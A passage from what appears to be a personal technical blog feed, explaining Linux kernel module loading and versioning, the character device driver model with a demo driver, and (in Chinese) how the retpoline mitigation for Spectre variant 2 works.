/* One of =[yYnN01] */
return strtobool(val, kp->arg);
}
int strtobool(const char *s, bool *res)
{
switch (s[0]) {
case 'y':
case 'Y':
case '1':
*res = true;
break;
case 'n':
case 'N':
case '0':
*res = false;
break;
default:
return -EINVAL;
}
return 0;
}
</code></pre></div></div>
<h2 id="version-control">Version control</h2>
<p>One thing we have lost is version control. Version control is used to keep consistency between kernel and module. We can’t load modules compiled for 2.6 kernel into 3.2 kernel. That’s why version control needed. Kernel and module uses CRC checksum to do this. The idea behind this is so easy, the build tools will generate CRC checksum for every exported function and for every function module reference. Then in ‘load_module’ function, these two CRC will be checked if there are the same. In order to support this mechism, the kernel config must contain ‘CONFIG_MODVERSIONS’. In EXPORT_SYMBOL macro, there is a __CRC_SYMBOL definition.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#ifdef CONFIG_MODVERSIONS
/* Mark the CRC weak since genksyms apparently decides not to
* generate a checksums for some symbols */
#define __CRC_SYMBOL(sym, sec) \
extern __visible void *__crc_##sym __attribute__((weak)); \
static const unsigned long __kcrctab_##sym \
__used \
__attribute__((section("___kcrctab" sec "+" #sym), unused)) \
= (unsigned long) &__crc_##sym;
#else
#define __CRC_SYMBOL(sym, sec)
#endif
</code></pre></div></div>
<p>Expand it.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>extern __visible void *__crc_textexport;
static const unsigned long __kcrctab_testexport = (unsigned long) &__crc_textexport;
</code></pre></div></div>
<p>So for every export symbol, build tools will generate a CRC checksum and store it in section ‘_kcrctab’.</p>
<p>The time for module load process. In hello.mod.c we can see the below:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static const struct modversion_info ____versions[]
__used
__attribute__((section("__versions"))) = {
{ 0x21fac097, __VMLINUX_SYMBOL_STR(module_layout) },
{ 0x27e1a049, __VMLINUX_SYMBOL_STR(printk) },
{ 0xbdfb6dbb, __VMLINUX_SYMBOL_STR(__fentry__) },
};
struct modversion_info {
unsigned long crc;
char name[MODULE_NAME_LEN];
};
</code></pre></div></div>
<p>The ELF will have an array of struct modversion stored in section ‘__versions’, and every element in this array have a crc and name to indicate the module references symbol.</p>
<p>In ‘check_version’, when it finds the symbole it will call ‘check_version’. Function ‘check_version’ iterates the ‘__versions’ and compare the finded symble’s CRC checksum. If it is the same, it passes the check.</p>
<h2 id="modinfo">Modinfo</h2>
<p>.ko file will also contain a ‘.modinfo’ section which stores some of the module information. modinfo program can show these info. In the source code, one can use ‘MODULE_INFO’ to add this information.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#define MODULE_INFO(tag, info) __MODULE_INFO(tag, tag, info)
#ifdef MODULE
#define __MODULE_INFO(tag, name, info) \
static const char __UNIQUE_ID(name)[] \
__used __attribute__((section(".modinfo"), unused, aligned(1))) \
= __stringify(tag) "=" info
#else /* !MODULE */
/* This struct is here for syntactic coherency, it is not used */
#define __MODULE_INFO(tag, name, info) \
struct __UNIQUE_ID(name) {}
#endif
</code></pre></div></div>
<p>MODULE_INFO just define a key-value data in ‘.modinfo’ section once the MODULE is defined. MODULE_INFO is used several places, such as license, vermagic:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#define MODULE_LICENSE(_license) MODULE_INFO(license, _license)
/*
* Author(s), use "Name <email>" or just "Name", for multiple
* authors use multiple MODULE_AUTHOR() statements/lines.
*/
#define MODULE_AUTHOR(_author) MODULE_INFO(author, _author)
/* What your module does. */
#define MODULE_DESCRIPTION(_description) MODULE_INFO(description, _description)
MODULE_INFO(vermagic, VERMAGIC_STRING);
</code></pre></div></div>
<h2 id="vermagic">vermagic</h2>
<p>vermagic is a string generated by kernel configuration information. ‘load_module’ will check this in ‘layout_and_allocate’->’check_modinfo’->’same_magic’. ‘VERMAGIC_STRING’ is generated by the kernel configuration.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#define VERMAGIC_STRING \
UTS_RELEASE " " \
MODULE_VERMAGIC_SMP MODULE_VERMAGIC_PREEMPT \
MODULE_VERMAGIC_MODULE_UNLOAD MODULE_VERMAGIC_MODVERSIONS \
MODULE_ARCH_VERMAGI
</code></pre></div></div>
<p>After doing the tough work, ‘load_module’ goes to the final work to call ‘do_init_module’.
If the module has an init function, ‘do_init_module’ will call it in function ‘do_one_initcall’. Then change the module’s state to ‘MODULE_STATE_LIVE’, and call the function registered in ‘module_notify_list’ list and finally free the INIT section of module.</p>
<h1 id="unload-module">Unload module</h1>
<p>Unload module is quite easy, it is done by syscall ‘delete_module’, which takes only the module name argument. First find the module in modules list and then check whether it is depended by other modules then call module exit function and finally notify the modules who are interested module unload by iterates ‘module_notify_list’.</p>
Anatomy of the Linux character devices2018-06-02T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2018/06/02/linux-character-devices
<p>Character device is one of the class of Linux devices. The coordinative devices contain block devices, network devices. Every class of devices has its own support infrastructure by kernel, often called device driver model. This article will disscuss the simple character devices model.</p>
<p>First we need prepare a simple character device driver and user program using it.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@debian986:~# cat demo_chr_dev.c
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/fs.h>
#include <linux/cdev.h>
static struct cdev chr_dev;
static dev_t ndev;
static int chr_open(struct inode *nd, struct file *filp)
{
int major = MAJOR(nd->i_rdev);
int minor = MINOR(nd->i_rdev);
printk("chr_open, major = %d, minor = %d\n", major, minor);
return 0;
}
static ssize_t chr_read(struct file *f, char __user *u, loff_t *off)
{
printk("In the chr_read() function\n");
return 0;
}
struct file_operations chr_ops =
{
.owner = THIS_MODULE,
.open = chr_open,
.read = chr_read,
};
static int demo_init(void)
{
int ret;
cdev_init(&chr_dev, &chr_ops);
ret = alloc_chrdev_region(&ndev, 0, 1, "chr_dev");
if(ret < 0)
return ret;
printk("demo_init():major = %d, minor = %d\n",MAJOR(ndev), MINOR(ndev));
ret = cdev_add(&chr_dev, ndev, 1);
if(ret < 0)
return ret;
return 0;
}
static void demo_exit(void)
{
printk("Removing chr_dev module...\n");
cdev_del(&chr_dev);
unregister_chrdev(ndev, 1);
}
module_init(demo_init);
module_exit(demo_exit);
MODULE_LICENSE("GPL");
root@debian986:~# cat Makefile
obj-m := demo_chr_dev.o
KERNELDIR := /lib/modules/$(shell uname -r)/build
PWD := $(shell pwd)
default:
$(MAKE) -C $(KERNELDIR) M=$(PWD) modules
clean:
rm -f *.o *.ko *.mod.c
</code></pre></div></div>
<p>The userspace program:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@debian986:~# cat main.c
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#define CHR_DEV_NAME "/dev/chr_dev"
int main()
{
int ret;
char buf[32];
int fd = open(CHR_DEV_NAME, O_RDONLY | O_NDELAY);
if(fd < 0)
{
printf("open file %s failed\n", CHR_DEV_NAME);
return -1;
}
read(fd, buf, 32);
close(fd);
return 0;
}
</code></pre></div></div>
<p>First install the ko, using dmesg we can the major and minor number of the device.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> [ 917.528480] demo_init():major = 249, minor = 0
</code></pre></div></div>
<p>Then we using maknod to create an entry in /dev directory:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@debian986:~# mknod /dev/chr_dev c 249 0
</code></pre></div></div>
<p>Now we have a chracter device, and run the main program, dmesg can show the open and read function has been executed.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> [ 978.055050] chr_open, major = 249, minor = 0
[ 978.055055] In the chr_read() function
</code></pre></div></div>
<h1 id="character-device-abstract">character device abstract</h1>
<p>Linux kernel uses struct ‘cdev’ to represent charater devices.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> //<include/linux/cdev.h>
struct cdev {
struct kobject kobj;
struct module *owner;
const struct file_operations *ops;
struct list_head list;
dev_t dev;
unsigned int count;
};
</code></pre></div></div>
<p>The most import field hereis ‘struct file_operations’ which define the interface to virtual file system, when the user program trigger system call like open/read/write, it will finally go to the function which ops defines.</p>
<p>‘dev’ here represent the device number containing major and minor.</p>
<p>‘list’ links all of the character devices in the system.
cdev’s initialization:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> //<fs/char_dev.c>
void cdev_init(struct cdev *cdev, const struct file_operations *fops)
{
memset(cdev, 0, sizeof *cdev);
INIT_LIST_HEAD(&cdev->list);
kobject_init(&cdev->kobj, &ktype_cdev_default);
cdev->ops = fops;
}
</code></pre></div></div>
<h1 id="device-number">device number</h1>
<p>Every device has a device number which was combined of major and minor number. Major number is used to indicate device driver major for indicate which device of the same class device.</p>
<p>‘dev_t’ is used to represent a device number, it is 32 unsigned bit.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> //<include/linux/types.h>
typedef __u32 __kernel_dev_t;
typedef __kernel_fd_set fd_set;
typedef __kernel_dev_t dev_t;
</code></pre></div></div>
<p>Its’ high 12 bits represents major number and low 20 bits represents minor number</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> //<include/linux/kdev_t.h>
#define MINORBITS 20
#define MAJOR(dev) ((unsigned int) ((dev) >> MINORBITS))
#define MINOR(dev) ((unsigned int) ((dev) & MINORMASK))
</code></pre></div></div>
<p>device number can be allocated by two function</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> register_chrdev_region
alloc_chrdev_region
</code></pre></div></div>
<p>The kernel uses ‘chrdevs’ global variable to manage device number’s allocation</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static struct char_device_struct {
struct char_device_struct *next;
unsigned int major;
unsigned int baseminor;
int minorct;
char name[64];
struct cdev *cdev; /* will die */
} *chrdevs[CHRDEV_MAJOR_HASH_SIZE];
</code></pre></div></div>
<p>‘register_chrdev_region’ records the device number in the chrdevs array.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int register_chrdev_region(dev_t from, unsigned count, const char *name)
{
struct char_device_struct *cd;
dev_t to = from + count;
dev_t n, next;
for (n = from; n < to; n = next) {
next = MKDEV(MAJOR(n)+1, 0);
if (next > to)
next = to;
cd = __register_chrdev_region(MAJOR(n), MINOR(n),
next - n, name);
if (IS_ERR(cd))
goto fail;
}
return 0;
fail:
to = n;
for (n = from; n < to; n = next) {
next = MKDEV(MAJOR(n)+1, 0);
kfree(__unregister_chrdev_region(MAJOR(n), MINOR(n), next - n));
}
return PTR_ERR(cd);
}
</code></pre></div></div>
<p>The really work is done by ‘__register_chrdev_region’, which takes a major number and counts of the major. In this function, it insert the dev_t in the chrdevs’s entry.
Of course we first need get the index:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> i = major_to_index(major);
</code></pre></div></div>
<p>Then ‘__register_chrdev_region’ check if the new added entry has conflicts with the already exists. If not added it in the chrdevs entry. After two 2 and 257 major number inserted:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> +------------------+
0 | |
+------------------+
1 | | struct char_device_struct
+------------------+
2 | +-------> +---------------+---> +---------------+
+------------------+ | next | | next |
| | +---------------+ +---------------+
| | | major=2 | | major=257 |
| | +---------------+ +---------------+
| | | baseminor=0 | | baseminor=0 |
| | +---------------+ +---------------+
| | | minorct=1 | | minorct=4 |
| | +---------------+ +---------------+
| | | "augdev" | | "devmodev" |
| | +---------------+ +---------------+
+------------------+
254 | |
+------------------+
</code></pre></div></div>
<p>‘alloc_chrdev_region’ is different with ‘register_chrdev_region’ is that the former hints the kernel to allocate a usable major number instead of specifying one in the later. It iterates chrdevs from last and find and empty entry to return as the major number.</p>
<h1 id="character-device-registration">character device registration</h1>
<p>After initializing the char device and allocating the device number, we need register this char device to system. It is done by ‘cdev_add’ function.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int cdev_add(struct cdev *p, dev_t dev, unsigned count)
{
int error;
p->dev = dev;
p->count = count;
error = kobj_map(cdev_map, dev, count, NULL,
exact_match, exact_lock, p);
if (error)
return error;
kobject_get(p->kobj.parent);
return 0;
}
</code></pre></div></div>
<p>Quite simple, the ‘p’ is the device which need added, the ‘dev’ is the device number, and count is the number of devices.</p>
<p>The core is to call kobj_map. ‘kobj_map’ adds the char device to a global variable ‘cdev_map’s hash table. ‘cdev_map’ is defined:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static struct kobj_map *cdev_map;
struct kobj_map {
struct probe {
struct probe *next;
dev_t dev;
unsigned long range;
struct module *owner;
kobj_probe_t *get;
int (*lock)(dev_t, void *);
void *data;
} *probes[255];
struct mutex *lock;
};
</code></pre></div></div>
<p>Here ‘probes’ field is liked the ‘chrdevs’ array, every entry represent a class of devices. The same value mod 255 is in the same entry.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int kobj_map(struct kobj_map *domain, dev_t dev, unsigned long range,
struct module *module, kobj_probe_t *probe,
int (*lock)(dev_t, void *), void *data)
{
unsigned n = MAJOR(dev + range - 1) - MAJOR(dev) + 1;
unsigned index = MAJOR(dev);
unsigned i;
struct probe *p;
if (n > 255)
n = 255;
p = kmalloc(sizeof(struct probe) * n, GFP_KERNEL);
if (p == NULL)
return -ENOMEM;
for (i = 0; i < n; i++, p++) {
p->owner = module;
p->get = probe;
p->lock = lock;
p->dev = dev;
p->range = range;
p->data = data;
}
mutex_lock(domain->lock);
for (i = 0, p -= n; i < n; i++, p++, index++) {
struct probe **s = &domain->probes[index % 255];
while (*s && (*s)->range < range)
s = &(*s)->next;
p->next = *s;
*s = p;
}
mutex_unlock(domain->lock);
return 0;
}
</code></pre></div></div>
<p>‘kobj_map’ first allocates a probe and then insert to one of the ‘cdev_map’s probes entry.
Below show after calling ‘cdev_add’ by two major satisfied major%255 = 2.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> +------------------+
0 | |
+------------------+
1 | | struct probe
+------------------+
2 | +-------> +-------------------> +---------------+
+------------------+ | next | | next |
| | +---------------+ +---------------+
probes[255]| | | dev | | |
| | +---------------+ +---------------+
| | | | | |
| | +---------------+ +---------------+
| | | locak | | |
| | +---------------+ +---------------+
| | | data +--+ | data |
| | +---------------+ | +---------------+
+------------------+ |
254 | | v
+------------------+ +--------------+
| |
+--------------+
| |
+--------------+
| |
+--------------+
| |
+--------------+
struct cdev
</code></pre></div></div>
<p>After calling ‘cdev_add’, the char device has been added to the system. The system can find our char device if needed. Before our user program can call user char device driver’s function, we need make a node in VFS so bridge the program and device driver.</p>
<h1 id="make-device-file-node">make device file node</h1>
<p>Device file is used to make a bridge between userspace program and kernel driver. As we know in Linux everything is a file, so if we want to export the driver’s service to user program, we must make an entry in VFS. We call mknod program in userspace will finally issues a ‘mknod’ system call.
The the kernel will allocate an inode in the filesystem. For now, we will just consider the how to connect the VFS and char device driver and emit the VFS connect to the specific filesystem.
The ‘vfs_mknod’ calls the specific filesystem’s mknod function.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int vfs_mknod(struct inode *dir, struct dentry *dentry, umode_t mode, dev_t dev)
{
int error = may_create(dir, dentry);
if (error)
return error;
if ((S_ISCHR(mode) || S_ISBLK(mode)) && !capable(CAP_MKNOD))
return -EPERM;
if (!dir->i_op->mknod)
return -EPERM;
error = devcgroup_inode_mknod(mode, dev);
if (error)
return error;
error = security_inode_mknod(dir, dentry, mode, dev);
if (error)
return error;
error = dir->i_op->mknod(dir, dentry, mode, dev);
if (!error)
fsnotify_create(dir, dentry);
return error;
}
</code></pre></div></div>
<p>We will uses shmem filesystem as an example, the inode operationgs is ‘shmem_dir_inode_operations’.
So it calls ‘shmem_mknod’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int
shmem_mknod(struct inode *dir, struct dentry *dentry, umode_t mode, dev_t dev)
{
struct inode *inode;
int error = -ENOSPC;
inode = shmem_get_inode(dir->i_sb, dir, mode, dev, VM_NORESERVE);
if (inode) {
error = simple_acl_create(dir, inode);
if (error)
goto out_iput;
error = security_inode_init_security(inode, dir,
&dentry->d_name,
shmem_initxattrs, NULL);
if (error && error != -EOPNOTSUPP)
goto out_iput;
error = 0;
dir->i_size += BOGO_DIRENT_SIZE;
dir->i_ctime = dir->i_mtime = CURRENT_TIME;
d_instantiate(dentry, inode);
dget(dentry); /* Extra count - pin the dentry in core */
}
return error;
out_iput:
iput(inode);
return error;
}
</code></pre></div></div>
<p>In ‘shmem_get_inode’, it allocates a new inode which represent our new create device, /dev/chr_dev for example. As our file is a char, it is special, so the ‘init_special_inode’ is called.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> void init_special_inode(struct inode *inode, umode_t mode, dev_t rdev)
{
inode->i_mode = mode;
if (S_ISCHR(mode)) {
inode->i_fop = &def_chr_fops;
inode->i_rdev = rdev;
} else if (S_ISBLK(mode)) {
inode->i_fop = &def_blk_fops;
inode->i_rdev = rdev;
} else if (S_ISFIFO(mode))
inode->i_fop = &pipefifo_fops;
else if (S_ISSOCK(mode))
inode->i_fop = &bad_sock_fops;
else
printk(KERN_DEBUG "init_special_inode: bogus i_mode (%o) for"
" inode %s:%lu\n", mode, inode->i_sb->s_id,
inode->i_ino);
}
</code></pre></div></div>
<p>This function’s work is to set the inode’s field ‘i_fop’ and ‘i_rdev’. Char device’s ‘i_fop’ is set to ‘def_chr_fops’:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> const struct file_operations def_chr_fops = {
.open = chrdev_open,
.llseek = noop_llseek,
};
</code></pre></div></div>
<p>The VFS and device driver is connected by ‘inode->i_rdev’ now.</p>
<h1 id="char-devices-operation">Char device’s operation</h1>
<p>For now, the user program can open our device and issues system call like open/write/read.</p>
<p>do_sys_open
–>do_filp_open
–>path_openat
–>do_last
–>vfs_open
–>do_dentry_open</p>
<p>After a long call chain, we arrive ‘do_dentry_open’ function:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int do_dentry_open(struct file *f,
struct inode *inode,
int (*open)(struct inode *, struct file *),
const struct cred *cred)
{
static const struct file_operations empty_fops = {};
int error;
f->f_mode = OPEN_FMODE(f->f_flags) | FMODE_LSEEK |
FMODE_PREAD | FMODE_PWRITE;
path_get(&f->f_path);
f->f_inode = inode;
f->f_mapping = inode->i_mapping;
...
/* POSIX.1-2008/SUSv4 Section XSI 2.9.7 */
if (S_ISREG(inode->i_mode))
f->f_mode |= FMODE_ATOMIC_POS;
f->f_op = fops_get(inode->i_fop);
if (unlikely(WARN_ON(!f->f_op))) {
error = -ENODEV;
goto cleanup_all;
}
...
if (!open)
open = f->f_op->open;
if (open) {
error = open(inode, f);
if (error)
goto cleanup_all;
}
...
}
</code></pre></div></div>
<p>For now the ‘inode’ is our create ‘/dev/chr_dev’ file. We assign ‘inode->i_fop’ to ‘f->f_op’. As we know:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> inode->i_fop = &def_chr_fops;
</code></pre></div></div>
<p>So
f->f_op = &def_chr_fops</p>
<p>Later, it will call f_op->open, which is ‘chrdev_open’:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int chrdev_open(struct inode *inode, struct file *filp)
{
const struct file_operations *fops;
struct cdev *p;
struct cdev *new = NULL;
int ret = 0;
spin_lock(&cdev_lock);
p = inode->i_cdev;
if (!p) {
struct kobject *kobj;
int idx;
spin_unlock(&cdev_lock);
kobj = kobj_lookup(cdev_map, inode->i_rdev, &idx);
if (!kobj)
return -ENXIO;
new = container_of(kobj, struct cdev, kobj);
spin_lock(&cdev_lock);
/* Check i_cdev again in case somebody beat us to it while
we dropped the lock. */
p = inode->i_cdev;
if (!p) {
inode->i_cdev = p = new;
list_add(&inode->i_devices, &p->list);
new = NULL;
} else if (!cdev_get(p))
ret = -ENXIO;
} else if (!cdev_get(p))
ret = -ENXIO;
spin_unlock(&cdev_lock);
cdev_put(new);
if (ret)
return ret;
ret = -ENXIO;
fops = fops_get(p->ops);
if (!fops)
goto out_cdev_put;
replace_fops(filp, fops);
if (filp->f_op->open) {
ret = filp->f_op->open(inode, filp);
if (ret)
goto out_cdev_put;
}
return 0;
out_cdev_put:
cdev_put(p);
return ret;
}
</code></pre></div></div>
<p>‘kobj_lookup’ find the cdev in ‘cdev_map’ according the ‘i_rdev’. After succeeding find the cdev, filp’s ‘f_op’ will be replaced by our cdev’s ops which is the struct file_operations implemented in our char device driver.</p>
<p>Next it calls the open function in struct file_operations implemented in driver.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> +--------------------------+
| open("/dev/chr_dev") |
+----------+----+----------+
| ^
1 | |
v |
+---------+----+-----+
| do_sys_open |
+--------+-----+-----+
inode | |
+-----------+ | +----------------5-------------------+
| | | |
+-----------+ | filp +-------------+ |
| i_fop | <-----+ | | |
+-----------+ +-------------+ +----+---+
+----+ i_rdev | +---+ f_op +-------+ fd |
| +-----------+ | +-------------+ +--------+
| | i_cdev +--------------+ | | ||
2 | +-----------+ | | +-------------|
| | +-------4-----------+
+----------------------+ | |
| 3 +--->v+----------------+
+-------+ +--------+ +----v----+ | | | read |
| +---> | +-> | | | | +----------------+
+-------+ +--------+ +----+----+ | | | write |
cdev_map | v | +----------------+
+------->----------------+ | | ioctl |
data | | | +----------------+
+---------------+ | | ... |
| ops +---+ +----------------+
+---------------+ | release |
| | |----------------+
+---------------+ file_operations
cdev
</code></pre></div></div>
<p>The above pic show the process of open a device file in user process.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> 1. The kernel call do_sys_open, get the file's inode and call i_fop, for char device i_fop is chrdev_open
2. find the cdev in cdev_map according the inode->i_rdev
3. assign the probe->data to inode->i_cdev, so that next no need to find in cdev_map
4. assign the cdev->ops to filp->f_op, so the next file system sys call can directly call the driver's file_operations through fd->fip->f_op
5. return the fd to user program
</code></pre></div></div>
<p>Let’s look an example of how to use the fd returned by the open in close function.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> SYSCALL_DEFINE1(close, unsigned int, fd)
{
int retval = __close_fd(current->files, fd);
/* can't restart close syscall because file table entry was cleared */
if (unlikely(retval == -ERESTARTSYS ||
retval == -ERESTARTNOINTR ||
retval == -ERESTARTNOHAND ||
retval == -ERESTART_RESTARTBLOCK))
retval = -EINTR;
return retval;
}
EXPORT_SYMBOL(sys_close);
int __close_fd(struct files_struct *files, unsigned fd)
{
struct file *file;
struct fdtable *fdt;
spin_lock(&files->file_lock);
fdt = files_fdtable(files);
if (fd >= fdt->max_fds)
goto out_unlock;
file = fdt->fd[fd];
if (!file)
goto out_unlock;
rcu_assign_pointer(fdt->fd[fd], NULL);
__clear_close_on_exec(fd, fdt);
__put_unused_fd(files, fd);
spin_unlock(&files->file_lock);
return filp_close(file, files);
out_unlock:
spin_unlock(&files->file_lock);
return -EBADF;
}
int filp_close(struct file *filp, fl_owner_t id)
{
int retval = 0;
if (!file_count(filp)) {
printk(KERN_ERR "VFS: Close: file count is 0\n");
return 0;
}
if (filp->f_op->flush)
retval = filp->f_op->flush(filp, id);
if (likely(!(filp->f_mode & FMODE_PATH))) {
dnotify_flush(filp, id);
locks_remove_posix(filp, id);
}
fput(filp);
return retval;
}
</code></pre></div></div>
<p>finnally go to __fput</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void __fput(struct file *file)
{
struct dentry *dentry = file->f_path.dentry;
struct vfsmount *mnt = file->f_path.mnt;
struct inode *inode = file->f_inode;
might_sleep();
fsnotify_close(file);
/*
* The function eventpoll_release() should be the first called
* in the file cleanup chain.
*/
eventpoll_release(file);
locks_remove_file(file);
if (unlikely(file->f_flags & FASYNC)) {
if (file->f_op->fasync)
file->f_op->fasync(-1, file, 0);
}
ima_file_free(file);
if (file->f_op->release)
file->f_op->release(inode, file);
security_file_free(file);
if (unlikely(S_ISCHR(inode->i_mode) && inode->i_cdev != NULL &&
!(file->f_mode & FMODE_PATH))) {
cdev_put(inode->i_cdev);
}
fops_put(file->f_op);
put_pid(file->f_owner.pid);
if ((file->f_mode & (FMODE_READ | FMODE_WRITE)) == FMODE_READ)
i_readcount_dec(inode);
if (file->f_mode & FMODE_WRITER) {
put_write_access(inode);
__mnt_drop_write(mnt);
}
file->f_path.dentry = NULL;
file->f_path.mnt = NULL;
file->f_inode = NULL;
file_free(file);
dput(dentry);
mntput(mnt);
}
</code></pre></div></div>
<p>From above a can see, the kernel calls a lot of filp->f_op function, which is defined in the struct file_operations in char device driver.</p>
retpoline: 原理与部署2018-03-24T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2018/03/24/retpoline
<p>本文主要翻译自<a href="https://software.intel.com/sites/default/files/managed/1d/46/Retpoline-A-Branch-Target-Injection-Mitigation.pdf?source=techstories.org">Retpoline: A Branch Target Injection Mitigation</a>.</p>
<h3> 原理 </h3>
<p>retpoline是Google开发的针对Spectre变种2漏洞缓解利用技术。Spectre变种2利用CPU的间接分支预测(indirect
branch predictor)功能,攻击者通过事先训练分支,让分支预测器去影响受害者进程,然后通过侧信道的方式来获取
受害者进程的信息。其实这个变种2的漏洞利用是非常困难的,Jann Horn的利用其实也是在一个老版本的kvm上,按照
Linus的说法是利用Spectre是”fairly hard”。</p>
<p>目前有两种方案来缓解Spectre漏洞,即硬件方案和软件方案。硬件方案就是IBRS + IBPB, 直接在硬件层面阻止投机执行
(speculative execution),当然,这会导致性能很低,所以IBRS没有进入内核。软件方案主要就是retpoline了, 因为
性能影响较低,最终得以进入内核主线。</p>
<p>每次CPU在快执行间接跳转的时候,比如jmp [xxx], call, 会去询问indirect branch predictor,然后投机选择一个最有
可能执行的路径。retpoline就是要绕过这个indirect branch predictor,使得CPU没有办法利用其它人故意训练出来的
分支路径。retpoline是 “return” 和 “trampoline”,也就是在间接跳转的时候用return指令添加了一个垫子。这个看了后文
就能够理解了。</p>
<p>ret指令的预测跟jmp和call不太一样,ret依赖于Return Stack Buffer(RSB)。跟indirect branch predictor不一样的是,RSB是一个
先进后出的stack。当执行call指令时,会push一项,执行ret时,会pop一项,这很容易由软件控制,比如下面的指令系列:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>__asm__ __volatile__(" call 1f; pause;"
"1: call 2f; pause;"
"2: call 3f; pause;"
"3: call 4f; pause;"
"4: call 5f; pause;"
"5: call 6f; pause;"
</code></pre></div></div>
<p><img src="/assets/img/retpoline/retpoline.png" alt="" /></p>
<p>上图显示了retpoline的基本原理,即用一段指令代替之前的简介跳转指令,然后CPU如果投机执行会陷入一个死循环。</p>
<p>下面分析一下jmp间接跳转指令如何被替换成retpoline的指令。</p>
<p><img src="/assets/img/retpoline/jmp.png" alt="" /></p>
<p>在这个例子中,jmp通过rax的值进行间接跳转,如果没有retpoline,处理器会去询问indirect branch predictor,如果之前有攻击者去训练过这个分支,会导致CPU执行特定的一个gadget代码。下面看看retpoline是如何阻止CPU投机执行的。</p>
<ol>
<li>
<p>“1: call load_label”这句话把”2: pause ; lfence”的地址压栈,当然也填充了RSB的一项,然后跳到load_label;</p>
</li>
<li>
<p>“4: mov %rax, (%rsp)”,这里把间接跳转的地址(*%rax)直接放到了栈顶,注意,这个时候内存中的栈顶地址和RSB里面地址不一样了;</p>
</li>
<li>
<p>如果这个时候ret CPU投机执行了,会使用第一步填充在RSB的地址进行,也就是”2:
pause ; lfence”,这里是一个死循环;</p>
</li>
<li>
<p>最后,CPU发现了内存栈上的返回地址跟RSB自己投机的地址不一样,所以,投机执行会终止,然后跳到*%rax。</p>
</li>
</ol>
<p>下面看看call指令被替换成retpoline的指令之后如何工作。</p>
<p><img src="/assets/img/retpoline/call.png" alt="" /></p>
<ol>
<li>首先从”1: jmp label2”跳到”7: call label0”;</li>
<li>“7: call label0”将”8: … continue execution”的地址压入了内存栈以及RSB中,然后跳到label0;</li>
<li>“2: call label1”将”3: pause ; lfence”的地址压入了内存栈以及RSB中,然后跳到lable1;</li>
</ol>
<p>这个时候内存栈和RSB如下:</p>
<p><img src="/assets/img/retpoline/4.png" alt="" /></p>
<ol>
<li>
<p>“5: mov %rax, (%rsp)” 这里把间接跳转的地址(*%rax)直接放到了栈顶,注意,这个时候内存中的栈顶地址和RSB里面地址不一样了;</p>
</li>
<li>
<p>“6: ret”.如果这个时候ret CPU投机执行了,会使用第3步填充在RSB的地址,”3: pause ; lfence”. 这是一个死循环;</p>
</li>
<li>
<p>最后,CPU发现了内存栈上的返回地址跟RSB自己投机的地址不一样,所以,投机执行会终止,然后跳到*%rax;</p>
</li>
</ol>
<p>这个时候内存栈和RSB如下</p>
<p><img src="/assets/img/retpoline/5.png" alt="" /></p>
<ol>
<li>当间接地址调用(*%rax)返回的时候,通过RSB和内存中地址继续执行步骤2的压的地址,也就是8那里。</li>
</ol>
<h3> 部署 </h3>
<p>由于大部分的间接跳转都是由编译器产生的,所以需要编译器的支持,目前最新的gcc已经支持了-mindirect-branch=thunk选项用于替换间接指令为retpoline系列。下面看看一个简单的例子:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <stdio.h>
#include <stdlib.h>
typedef void (*fp)();
void test()
{
printf("indirect test\n");
}
int main()
{
fp f = test;
f();
}
</code></pre></div></div>
